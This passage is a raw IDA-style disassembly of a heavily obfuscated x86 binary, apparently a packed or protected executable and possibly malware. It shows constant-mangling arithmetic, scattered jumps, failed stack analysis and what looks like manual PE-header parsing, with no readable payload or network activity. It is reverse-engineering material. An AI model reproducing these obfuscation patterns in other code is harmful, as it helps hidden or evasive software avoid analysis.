; FUNCTION CHUNK AT 0042A4BB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042BACF SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042D292 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042E4E6 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042E5D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E6F9 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042F5B6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042FBEC SIZE 0000000B BYTES
xchg esi, [esp+0]
pop esi
cmp ebx, esi
pop esi
jz loc_4288DD
jmp loc_42F5B6
sub_42EBD6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42EBE8: ; DATA XREF: sub_425A0D+3�o
push ecx
mov esp, ebp
pop ebp
push 0DE3B6FD8h
xchg edx, [esp]
mov eax, edx
jmp loc_426809
; =============== S U B R O U T I N E =======================================
sub_42EBFB proc near ; CODE XREF: _7hdaygc1:loc_4242A7�p
; _7hdaygc1:004264F4�j
xchg ebx, [esp+0]
pop ebx
xor esi, 3AF6EA05h
call sub_42A693
loc_42EC0A: ; DATA XREF: _7hdaygc1:00423320�o
push eax
push ebx
push 2F6829B0h
pop ebx
rol ebx, 0Bh
and ebx, 0FBF1B20Fh
rol ebx, 17h
jmp loc_42C399
sub_42EBFB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
sub ecx, 82DDD548h
jmp sub_42A1B6
; ---------------------------------------------------------------------------
loc_42EC2E: ; CODE XREF: _7hdaygc1:0042D694�j
lea eax, [edx+eax*4]
push esi
mov esi, eax
xchg esi, [esp]
jmp loc_4253CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FD11
loc_42EC3C: ; CODE XREF: sub_42FD11:loc_426D9D�j
; sub_42FD11-5EF2�j
lea eax, sub_428F69
mov [ebp-4], eax
push 4979A709h
pop eax
or eax, 34D86554h
jmp loc_4285E6
; END OF FUNCTION CHUNK FOR sub_42FD11
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_126. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_42EC57: ; CODE XREF: sub_423648+9FF9�j
jmp loc_4243DF
; END OF FUNCTION CHUNK FOR sub_423648
; ---------------------------------------------------------------------------
loc_42EC5C: ; CODE XREF: _7hdaygc1:00426454�j
jmp loc_42F591
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B20
loc_42EC61: ; CODE XREF: sub_423B20:loc_42CBD7�j
add eax, 20D198EBh
or eax, 1332F7h
add eax, 2B0ECE10h
xchg eax, [esp+0]
jmp sub_42D757
; END OF FUNCTION CHUNK FOR sub_423B20
; ---------------------------------------------------------------------------
jle loc_423EE0
jmp sub_42948A
; ---------------------------------------------------------------------------
loc_42EC86: ; DATA XREF: sub_42D503+1�o
push 8388E5BBh
pop ebx
rol ebx, 1Eh
add ebx, 1F600631h
xchg ebx, [esp]
jmp sub_423FA0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E695
loc_42EC9D: ; CODE XREF: sub_42E695-8C63�j
pushf
ror eax, 1Eh
loc_42ECA1: ; CODE XREF: sub_42E695:loc_425A2A�j
add edi, 36241E04h
xchg edi, [esp+0]
loc_42ECAA: ; CODE XREF: _7hdaygc1:loc_42EF53�j
jmp sub_42C1AF
; END OF FUNCTION CHUNK FOR sub_42E695
; =============== S U B R O U T I N E =======================================
sub_42ECAF proc near ; CODE XREF: sub_42B650-7110�p
; _7hdaygc1:0042950C�j
xchg ebx, [esp+0]
pop ebx
mov [ebp-4], eax
call nullsub_3
loc_42ECBB: ; CODE XREF: sub_42CB85+6FD�j
mov eax, [ebp-4]
call sub_4236EA
jmp loc_42C787
sub_42ECAF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42ECC8: ; CODE XREF: _7hdaygc1:00423913�j
push edx
mov ecx, [esi]
loc_42ECCB: ; CODE XREF: _7hdaygc1:loc_423901�j
and edi, 8ECD3856h
xor edi, 0C2B287F2h
add edi, 0BDC854F5h
xchg edi, [esp]
jmp loc_42C3DE
; ---------------------------------------------------------------------------
push offset loc_42C19F
jmp loc_42EEC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427EF6
loc_42ECEF: ; CODE XREF: sub_427EF6+DC�j
push 0E7EC1826h
pop esi
rol esi, 0Eh
or esi, 0C8D60538h
xor esi, 3987C02Fh
jmp loc_42DC1A
; END OF FUNCTION CHUNK FOR sub_427EF6
; ---------------------------------------------------------------------------
rol ebx, 5
jmp sub_4242E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA9B
loc_42ED11: ; CODE XREF: sub_42AA9B-76F0�j
ja loc_42C76F
rol ebp, 4
loc_42ED1A: ; CODE XREF: sub_42AA9B:loc_423304�j
mov eax, 10h
call sub_42828C
push ebp
jmp loc_42CEE2
; END OF FUNCTION CHUNK FOR sub_42AA9B
; =============== S U B R O U T I N E =======================================
sub_42ED2A proc near ; CODE XREF: sub_42BFDF+3�j
; FUNCTION CHUNK AT 004230A3 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042583E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00425A1B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004297C4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A644 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042A65D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042A9DB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EA13 SIZE 00000016 BYTES
add esp, 0FFFFFFF4h
mov [ebp-8], edx
mov [ebp-4], eax
cmp dword ptr [ebp-8], 0
jnz loc_4230A3
mov eax, [ebp-4]
mov [ebp-8], eax
jmp loc_42A9DB
sub_42ED2A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42ED48: ; CODE XREF: _7hdaygc1:0042DE1F�j
add edi, 2C5A358Ah
; =============== S U B R O U T I N E =======================================
sub_42ED4E proc near ; CODE XREF: sub_42F8DB:loc_423A2F�p
; FUNCTION CHUNK AT 00426DE6 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004284F3 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004288D6 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00429369 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B22F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E10F SIZE 00000013 BYTES
xchg eax, [esp+0]
pop eax
xor ecx, ecx
jmp loc_426DE6
sub_42ED4E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42ED59: ; CODE XREF: _7hdaygc1:loc_42C943�j
; _7hdaygc1:0042EA0E�j
push 0AE9C309Bh
pop eax
add eax, 5D4B7C3Ah
and eax, 58A36361h
jmp loc_423880
; =============== S U B R O U T I N E =======================================
sub_42ED70 proc near ; CODE XREF: _7hdaygc1:00426EAE�j
; sub_42D01B+80D�p
arg_0 = dword ptr 4
xchg eax, [esp+0]
pop eax
xchg ebx, [esp-4+arg_0]
jmp loc_424D0A
sub_42ED70 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push 68BAF0FEh
pop edx
and edx, 0D059EC3Eh
sub edx, 8CC6AE0Eh
jmp loc_42AE6F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A17C
loc_42ED93: ; CODE XREF: sub_42A17C:loc_42C33F�j
jz loc_42AF85
jmp loc_42DBD1
; END OF FUNCTION CHUNK FOR sub_42A17C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A92E
loc_42ED9E: ; CODE XREF: sub_42A92E-3F03�j
jnz loc_42C4B4
loc_42EDA4: ; CODE XREF: sub_42A92E:loc_4249FC�j
call sub_42D757
push 0AD15145Ah
pop edx
and edx, 0D6B90E4Ch
add edx, 3782170Dh
call sub_42C1AF
push eax
jmp loc_42322F
; END OF FUNCTION CHUNK FOR sub_42A92E
; ---------------------------------------------------------------------------
loc_42EDC6: ; CODE XREF: _7hdaygc1:loc_42D699�j
; _7hdaygc1:0042D6A7�j
xor ebx, 0DC8A3EE1h
test ebx, 100000h
jmp loc_42DBF1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424CE0
loc_42EDD7: ; CODE XREF: _7hdaygc1:00424CF8�j
; sub_424CE0+617D�j
sub ecx, 2CED74F7h
add ecx, 1E0072h
add ecx, ebp
add ecx, 58C9722Bh
mov ecx, [ecx]
jmp loc_4246EF
; END OF FUNCTION CHUNK FOR sub_424CE0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9E1
loc_42EDF2: ; CODE XREF: sub_42D9E1-501A�j
xor esi, 0D67C7543h
push esi
cmp eax, ecx
jmp loc_4280D6
; END OF FUNCTION CHUNK FOR sub_42D9E1
; ---------------------------------------------------------------------------
loc_42EE00: ; CODE XREF: _7hdaygc1:00429935�j
jl loc_42BFD0
loc_42EE06: ; CODE XREF: _7hdaygc1:loc_42B51D�j
push ebp
jmp loc_42DC5D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_42EE0C: ; CODE XREF: sub_423DFC:loc_42E605�j
call sub_42E076
loc_42EE11: ; CODE XREF: sub_42DA74+7B9�j
jmp sub_42B942
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
loc_42EE16: ; CODE XREF: _7hdaygc1:0042A217�j
jz loc_4247D9
jmp loc_4235EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E254
loc_42EE21: ; CODE XREF: sub_42E254:loc_42678C�j
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp-4], eax
mov eax, [ebp-4]
loc_42EE2C: ; CODE XREF: sub_428498:loc_42BD62�j
jmp loc_42531C
; END OF FUNCTION CHUNK FOR sub_42E254
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C209
loc_42EE31: ; CODE XREF: sub_42C209+B�j
jz loc_428DC3
jmp loc_429244
; END OF FUNCTION CHUNK FOR sub_42C209
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_118. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429FC3
loc_42EE3D: ; CODE XREF: sub_429FC3+C�j
jmp loc_426639
; END OF FUNCTION CHUNK FOR sub_429FC3
; ---------------------------------------------------------------------------
sub ebx, 0C441D02Fh
jmp sub_429C1F
; ---------------------------------------------------------------------------
mov edx, 17B3C1CFh
push edi
push 71DA91BEh
pop edi
or edi, 8391E2FCh
xor edi, 0BE0E8230h
or edi, 0DA290EBBh
jmp loc_42A7F7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_42EE70: ; CODE XREF: sub_423172:loc_4289A1�j
and eax, 0F35DEE81h
rol eax, 14h
xor eax, 94F7095Dh
and eax, 0AC60F218h
jmp loc_42AAA7
; END OF FUNCTION CHUNK FOR sub_423172
; =============== S U B R O U T I N E =======================================
sub_42EE8A proc near ; CODE XREF: _7hdaygc1:00425941�p
; _7hdaygc1:0042BBC9�j
; FUNCTION CHUNK AT 00424FA4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426AEC SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00426FCD SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042711D SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00428580 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00429374 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B162 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042E538 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
push 8EC4EF48h
pop eax
sub eax, 3C39A30Ch
add eax, 0D70147F4h
jmp loc_42E538
sub_42EE8A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
not edx
jmp sub_42E076
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CDF7
loc_42EEAC: ; CODE XREF: sub_42CDF7:loc_424431�j
js loc_42AD4C
loc_42EEB2: ; CODE XREF: _7hdaygc1:0042D309�j
jmp loc_42BCB6
; END OF FUNCTION CHUNK FOR sub_42CDF7
; ---------------------------------------------------------------------------
not ecx
jmp loc_42AD46
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4237DA
loc_42EEBE: ; CODE XREF: sub_4237DA:loc_428B50�j
call sub_425E64
loc_42EEC3: ; CODE XREF: _7hdaygc1:0042ECEA�j
jmp nullsub_103
; END OF FUNCTION CHUNK FOR sub_4237DA
; ---------------------------------------------------------------------------
loc_42EEC8: ; CODE XREF: _7hdaygc1:0042C591�j
cmp eax, ecx
jmp loc_42F318
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_127. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EF3C
loc_42EED0: ; CODE XREF: sub_42EF3C+1C6�j
jmp sub_42C26B
; END OF FUNCTION CHUNK FOR sub_42EF3C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_14. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DDB
loc_42EED6: ; CODE XREF: sub_423DDB:loc_42AB27�j
mov eax, [ebp-0Ch]
mov [ebp-1Ch], eax
lea eax, [ebp-125h]
mov [ebp-20h], eax
jmp loc_42FC84
; END OF FUNCTION CHUNK FOR sub_423DDB
; ---------------------------------------------------------------------------
mov edi, [eax]
jmp sub_428498
; ---------------------------------------------------------------------------
loc_42EEF1: ; CODE XREF: _7hdaygc1:0042AC8F�j
sbb ecx, edi
jmp loc_42FC1D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4288FE
loc_42EEF8: ; CODE XREF: sub_4288FE+6DA4�j
mov eax, 87EFB934h
sbb ebx, ecx
mov edi, ebp
xchg ebp, esi
mov ebx, eax
jmp loc_426CA2
; END OF FUNCTION CHUNK FOR sub_4288FE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_22. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D002
loc_42EF0B: ; CODE XREF: sub_42D002+E8E�j
jmp loc_4283FF
; END OF FUNCTION CHUNK FOR sub_42D002
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_42EF10: ; CODE XREF: sub_424AE1+498B�j
jmp loc_42B3CF
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42EF15: ; CODE XREF: sub_42C443-7563�j
jmp loc_4239BA
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FA0
loc_42EF1A: ; CODE XREF: sub_423FA0+E�j
jmp sub_4282A9
; END OF FUNCTION CHUNK FOR sub_423FA0
; ---------------------------------------------------------------------------
loc_42EF1F: ; CODE XREF: _7hdaygc1:loc_42C016�j
mov ds:dword_42BC5C, eax
retn
; ---------------------------------------------------------------------------
loc_42EF26: ; CODE XREF: _7hdaygc1:loc_42CFF7�j
rol eax, 18h
push eax
call sub_42B650
retn
; =============== S U B R O U T I N E =======================================
sub_42EF30 proc near ; CODE XREF: sub_425752+9�p
; sub_4270E6+F�p
; FUNCTION CHUNK AT 0042866D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042AFD2 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042F482 SIZE 00000005 BYTES
push ebp
jmp loc_42F482
sub_42EF30 endp
; ---------------------------------------------------------------------------
loc_42EF36: ; CODE XREF: _7hdaygc1:0042B52A�j
jge locret_42C169
; =============== S U B R O U T I N E =======================================
sub_42EF3C proc near ; CODE XREF: sub_4232DA:loc_42DA8C�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042527F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DE5C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042EED0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F0F8 SIZE 0000000F BYTES
xchg edx, [esp+0]
loc_42EF3F: ; CODE XREF: _7hdaygc1:004236C1�j
pop edx
lea eax, [ebp-0Ch]
call sub_42F3C8
xchg esi, [esp+0]
mov ecx, esi
pop esi
jmp loc_42527F
sub_42EF3C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42EF53: ; CODE XREF: _7hdaygc1:00428F58�j
jno loc_42ECAA
shr edx, 15h
or ebx, 62FC600Ch
shr edi, 19h
jmp loc_42A593
; ---------------------------------------------------------------------------
not ebx
jmp loc_42AD0B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_130. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424494
loc_42EF72: ; CODE XREF: sub_424494+11�j
jmp loc_42433B
; END OF FUNCTION CHUNK FOR sub_424494
; =============== S U B R O U T I N E =======================================
sub_42EF77 proc near ; DATA XREF: sub_42525E:loc_428B9F�o
; FUNCTION CHUNK AT 0042D0A2 SIZE 0000000E BYTES
mov byte ptr [eax], 6Ch
inc dword ptr [ebp-20h]
mov eax, [ebp-20h]
mov byte ptr [eax], 6Ch
inc dword ptr [ebp-20h]
jmp loc_42D0A2
sub_42EF77 endp
; ---------------------------------------------------------------------------
loc_42EF8B: ; CODE XREF: _7hdaygc1:0042C607�j
jp loc_42AB47
; =============== S U B R O U T I N E =======================================
sub_42EF91 proc near ; CODE XREF: sub_423DDB:loc_424251�p
var_18 = dword ptr -18h
; FUNCTION CHUNK AT 004241A3 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00424D71 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004251C9 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00426F7D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427E31 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042A140 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042B234 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C970 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042CD8A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CE5A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D554 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042E057 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F9A5 SIZE 00000017 BYTES
xchg ecx, [esp+18h+var_18]
pop ecx
mov eax, [ebp-1Ch]
loc_42EF98: ; CODE XREF: _7hdaygc1:loc_42B085�j
mov al, [eax]
mov edx, [ebp-20h]
mov [edx], al
jmp loc_427E31
sub_42EF91 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426606
loc_42EFA4: ; CODE XREF: sub_426606+1A�j
mov eax, [eax]
push eax
call sub_426CBB
mov eax, [ebp-4]
mov eax, [eax+3Ch]
push offset sub_426315
jmp nullsub_192
; END OF FUNCTION CHUNK FOR sub_426606
; =============== S U B R O U T I N E =======================================
sub_42EFBC proc near ; DATA XREF: _7hdaygc1:0042E366�o
; FUNCTION CHUNK AT 0042350C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00423599 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042366D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042A32E SIZE 0000001A BYTES
call edx
pop ebp
xor eax, eax
mov [ebp-4], eax
push 3517B892h
pop eax
jmp loc_423599
sub_42EFBC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42EFCF: ; CODE XREF: _7hdaygc1:0042BA72�j
js loc_42A4E4
; START OF FUNCTION CHUNK FOR sub_42524F
loc_42EFD5: ; CODE XREF: sub_42524F+61F5�j
add edi, 428E94h
xchg edi, [esp+0]
jmp nullsub_63
; END OF FUNCTION CHUNK FOR sub_42524F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42936E
loc_42EFE3: ; CODE XREF: sub_42936E:loc_42B573�j
mov edx, ebp
xchg edx, [esp+4+var_4]
mov ebp, esp
push ebp
mov ebp, ecx
xchg ebp, [esp+8+var_8]
jmp loc_42FA91
; END OF FUNCTION CHUNK FOR sub_42936E
; =============== S U B R O U T I N E =======================================
sub_42EFF5 proc near ; DATA XREF: _7hdaygc1:0042ADC8�o
; FUNCTION CHUNK AT 0042A121 SIZE 00000005 BYTES
sub edx, eax
push offset sub_425008
jmp loc_42A121
sub_42EFF5 endp
; ---------------------------------------------------------------------------
loc_42F001: ; DATA XREF: sub_423DFC:loc_42A348�o
add eax, ebp
push ebx
push 3E1E29D8h
pop ebx
sub ebx, 8BEC2969h
add ebx, 57232036h
add eax, ebx
pop ebx
jmp loc_42B375
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_42F01E: ; CODE XREF: sub_42AFFE+2582�j
jz loc_4292C1
mov ecx, ebx
loc_42F026: ; CODE XREF: sub_42AFFE+2576�j
add ecx, 79D8A167h
add ecx, ebp
add ecx, 86072445h
mov [ecx], eax
pop ecx
jmp loc_42A043
; END OF FUNCTION CHUNK FOR sub_42AFFE
; =============== S U B R O U T I N E =======================================
sub_42F03C proc near ; CODE XREF: sub_424680+454A�p
; sub_42FCD3:loc_42F926�j
; FUNCTION CHUNK AT 00429EF3 SIZE 0000000D BYTES
push ebp
jmp loc_429EF3
sub_42F03C endp
; =============== S U B R O U T I N E =======================================
sub_42F042 proc near ; DATA XREF: sub_42D031+A�o
push eax
pop ebp
call sub_42D054
sub_42F042 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4236EA
loc_42F049: ; CODE XREF: sub_4236EA+938A�j
jmp nullsub_110
; END OF FUNCTION CHUNK FOR sub_4236EA
; ---------------------------------------------------------------------------
loc_42F04E: ; CODE XREF: _7hdaygc1:0042C8DB�j
jmp loc_42E022
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429318
loc_42F053: ; CODE XREF: sub_429318-5971�j
jmp loc_42A4A4
; END OF FUNCTION CHUNK FOR sub_429318
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_203. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BAD
loc_42F059: ; CODE XREF: sub_425BAD+813C�j
jmp nullsub_112
; END OF FUNCTION CHUNK FOR sub_425BAD
; =============== S U B R O U T I N E =======================================
sub_42F05E proc near ; CODE XREF: _7hdaygc1:00425BA7�j
; sub_426D10+1C59�p
; FUNCTION CHUNK AT 00423594 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424E38 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004273BD SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00427405 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 0042914E SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042A635 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042A892 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042B16F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042DA91 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E572 SIZE 00000011 BYTES
xchg ebx, [esp+0]
pop ebx
mov [ebp-14h], eax
cmp dword ptr [ebp-10h], 3
jnb loc_42F411
jmp loc_423594
sub_42F05E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42F074: ; CODE XREF: _7hdaygc1:00425AF4�j
pop ebp
; =============== S U B R O U T I N E =======================================
sub_42F075 proc near ; CODE XREF: sub_428AF7+284�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004234F1 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00425F73 SIZE 00000013 BYTES
xchg edx, [esp+0]
pop edx
mov [esi], ebx
xchg ecx, [esp+0]
jmp loc_425F73
sub_42F075 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_42F083: ; CODE XREF: sub_423172+1D01�j
push esi
push 95D83EE5h
pop esi
add esi, 0F41D124Eh
js loc_42CFB3
mov ecx, 8ECF61B6h
jmp loc_423214
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A104
loc_42F0A0: ; CODE XREF: sub_42A104:loc_425AEE�j
mov eax, [ebp-0Ch]
call sub_42F0B4
mov [ebp-0Ch], eax
add dword ptr [ebp-4], 4
jmp loc_429B30
; END OF FUNCTION CHUNK FOR sub_42A104
; =============== S U B R O U T I N E =======================================
sub_42F0B4 proc near ; CODE XREF: sub_423DFC+256F�p
; sub_42A104+4F9F�p
; FUNCTION CHUNK AT 0042BCDE SIZE 0000000C BYTES
push ebp
jmp loc_42BCDE
sub_42F0B4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_42F0BA: ; CODE XREF: sub_424AE1:loc_429BED�j
push 0EEFC31C0h
pop eax
sub eax, 0EAF41716h
test eax, 800000h
jmp loc_42B7BB
; END OF FUNCTION CHUNK FOR sub_424AE1
; =============== S U B R O U T I N E =======================================
sub_42F0D1 proc near ; DATA XREF: _7hdaygc1:00425FFE�o
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042B3A8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D4E1 SIZE 00000017 BYTES
push ecx
push 4E75047Ah
pop ecx
and ecx, 0C1DECD1Fh
push edi
mov edi, offset loc_4286D4
jmp loc_42B3A8
sub_42F0D1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F65A
loc_42F0E9: ; CODE XREF: sub_42F65A:loc_42C3B9�j
cmp dword ptr [ebp-30h], 0
jle loc_424D35
jmp loc_429BFC
; END OF FUNCTION CHUNK FOR sub_42F65A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EF3C
loc_42F0F8: ; CODE XREF: sub_42EF3C-10D2�j
mov ecx, edx
xchg ecx, [esp-4+arg_0]
push eax
mov eax, [ebp-4]
cdq
jmp loc_42EED0
; END OF FUNCTION CHUNK FOR sub_42EF3C
; ---------------------------------------------------------------------------
mov [ebp+0], edi
jmp sub_4291A3
; ---------------------------------------------------------------------------
loc_42F10F: ; CODE XREF: _7hdaygc1:004259EB�j
pushf
push 0F4C55868h
pop eax
sub eax, 853BD2AFh
or eax, 0A77C10E2h
jmp loc_42F9F6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D0FB
loc_42F127: ; CODE XREF: sub_42D0FB+C�j
; sub_42E84F+B�j
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
and eax, 0FFh
mov eax, ds:dword_427884[eax*4]
mov [ebp-8], eax
; END OF FUNCTION CHUNK FOR sub_42D0FB
; START OF FUNCTION CHUNK FOR sub_423648
loc_42F13C: ; CODE XREF: sub_423648+DA1�j
; sub_423648:loc_428B89�j
js loc_429D82
loc_42F142: ; CODE XREF: _7hdaygc1:loc_42A593�j
jmp loc_429D66
; END OF FUNCTION CHUNK FOR sub_423648
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_42F147: ; CODE XREF: sub_426130:loc_42508F�j
jnz loc_42DF67
jmp loc_4240DC
; END OF FUNCTION CHUNK FOR sub_426130
; =============== S U B R O U T I N E =======================================
sub_42F152 proc near ; CODE XREF: _7hdaygc1:00429C5E�j
; sub_4268D9+57D3�p
; FUNCTION CHUNK AT 00425D5A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425E30 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00426166 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004291D9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004292E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CB72 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042FB4F SIZE 0000000B BYTES
xchg esi, [esp+0]
pop esi
add eax, ebp
add eax, 3502F25Ch
mov eax, [eax]
mov al, [ebp+eax-20h]
mov edx, [ebp-4]
jmp loc_4291D9
sub_42F152 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jmp loc_4251E3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_42F171: ; CODE XREF: sub_426130-10A7�j
; _7hdaygc1:00429C91�j
mov eax, [ebp-4]
push ebx
push 91CA5E0Ah
loc_42F17A: ; CODE XREF: _7hdaygc1:loc_42CF60�j
pop ebx
and ebx, 3EE05F15h
sub ebx, 91D7A176h
jmp loc_4286D9
; END OF FUNCTION CHUNK FOR sub_426130
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_42F18C: ; CODE XREF: sub_425E64-EC5�j
jo loc_42933A
; END OF FUNCTION CHUNK FOR sub_425E64
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_42F192: ; CODE XREF: sub_42F152:loc_425D5A�j
; sub_42F152-9321�j ...
push 9F59278Ah
pop eax
xor eax, 0BE60DE58h
rol eax, 16h
jmp loc_42F4A7
; END OF FUNCTION CHUNK FOR sub_42AA47
; ---------------------------------------------------------------------------
push eax
ror eax, 8
mov ds:dword_42BC38, eax
retn
; ---------------------------------------------------------------------------
